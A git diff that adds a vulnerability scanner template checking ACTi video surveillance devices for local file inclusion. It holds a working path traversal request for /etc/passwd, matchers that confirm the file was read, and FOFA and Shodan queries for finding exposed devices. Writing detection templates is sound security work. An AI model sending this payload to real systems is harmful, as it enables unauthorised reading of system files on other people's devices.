diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml new file mode 100644 index 0000000000..611c05b49d --- /dev/null +++ b/http/vulnerabilities/other/acti-video-lfi.yaml @@ -0,0 +1,36 @@ +id: acti-video-lfi + +info: + name: ACTi-Video Monitoring - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + ACTI video surveillance has loopholes in reading any files + reference: + - https://www.cnblogs.com/hmesed/p/16292252.html + metadata: + max-request: 1 + fofa-query: app="ACTi-视频监控" + shodan-query: title:"Web Configurator" + tags: acti,lfi,iot,video,monitoring + +http: + - method: GET + path: + - "{{BaseURL}}/images/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200